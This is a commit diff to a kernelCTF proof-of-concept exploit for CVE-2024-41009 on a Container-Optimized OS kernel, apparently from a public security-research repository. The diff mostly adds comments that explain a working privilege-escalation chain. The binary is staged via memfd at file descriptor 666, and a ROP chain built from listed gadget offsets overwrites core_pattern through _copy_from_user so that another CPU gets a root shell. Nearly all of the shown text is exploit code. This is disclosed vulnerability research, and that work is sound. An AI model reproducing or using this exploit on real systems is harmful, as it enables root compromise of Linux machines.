Update exploit.c

google · Dec 6, 2024 · c7ea1ab · c7ea1ab
1 parent cb81b05
commit c7ea1ab
Showing 1 changed file with 10 additions and 12 deletions.
diff --git a/pocs/linux/kernelctf/CVE-2024-41009_lts_cos/exploit/cos-105-17412.370.23/exploit.c b/pocs/linux/kernelctf/CVE-2024-41009_lts_cos/exploit/cos-105-17412.370.23/exploit.c
@@ -161,16 +161,6 @@ typedef long long i64;
 		BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), \
 		BPF_MOV64_REG((dst), BPF_REG_0), BPF_MOV64_IMM(BPF_REG_0, 0)
 
-#define LOG_BUF_SIZE 65536
-
-#define BPF_HEAVY_JOB                             \
-	BPF_MOV64_REG(BPF_REG_1, BPF_REG_6),          \
-		BPF_MOV64_REG(BPF_REG_2, BPF_REG_7),      \
-		BPF_MOV64_IMM(BPF_REG_3, 0x10000000),     \
-		BPF_MOV64_IMM(BPF_REG_4, 0x0),            \
-		BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, \
-					 BPF_FUNC_ringbuf_output)
-
 #define INST(x) (sizeof(x) / sizeof(struct bpf_insn))
 
 char buf[0x1000];
@@ -288,7 +278,9 @@ int check_core()
 void crash(char *cmd)
 {
 	int memfd = memfd_create("", 0);
+	// send our binary to memfd for core_pattern payload
 	SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+	// our binary now at file descriptor 666
 	dup2(memfd, 666);
 	close(memfd);
 	while (check_core() == 0)
@@ -309,8 +301,10 @@ int main(int argc, char **argv)
 	char *core =
 		(void *)mmap((void *)0xa00000, 0x2000, PROT_READ | PROT_WRITE,
 					 MAP_PRIVATE | MAP_FIXED | MAP_ANON, -1, 0);
+	// setup core_pattern payload that will execute /proc/pid/fd/666
+	// which we already prepare before
 	strcpy(core,
-		   "|/proc/%P/fd/666 %P"); // put payload string into known address which will used by ebpf shellcode
+		   "|/proc/%P/fd/666 %P"); // put payload string into 0xa00000 which will used by ROP gadget
 	if (argc > 1)
 	{
 		// #define SYS_pidfd_getfd 438
@@ -356,20 +350,24 @@ int main(int argc, char **argv)
 	addr[0x38 / 8] = stext + 0x000000000002bb97;
 	size_t* rop = &addr[0x68 / 8];
 
+
 	//0x0000000000005f3a : pop rdi ; ret
 	*(rop++) = stext + 0x0000000000005f3a;
 	*(rop++) = stext + core_pattern;
 	//0x0000000000006277 : pop rsi ; ret
 	*(rop++) = stext + 0x0000000000006277;
-	*(rop++) = 0xa00000;
+	*(rop++) = 0xa00000; // core_pattern payload at user addr
 	//0x0000000000028245 : pop rdx ; ret
 	*(rop++) = stext + 0x0000000000028245;
 	*(rop++) = 0x20;
+	// _copy_from_user(core_pattern, 0xa00000, 0x20)
 	*(rop++) = stext + _copy_from_user;
 
 	//0x0000000000005f3a : pop rdi ; ret
 	*(rop++) = stext + 0x0000000000005f3a;
 	*(rop++) = 0x10000000;
+	// do msleep(0x10000000) instead of return to user
+	// let another CPU gives us root shell
 	*(rop++) = stext + msleep;
 
 	/* load our bpf prog exploit */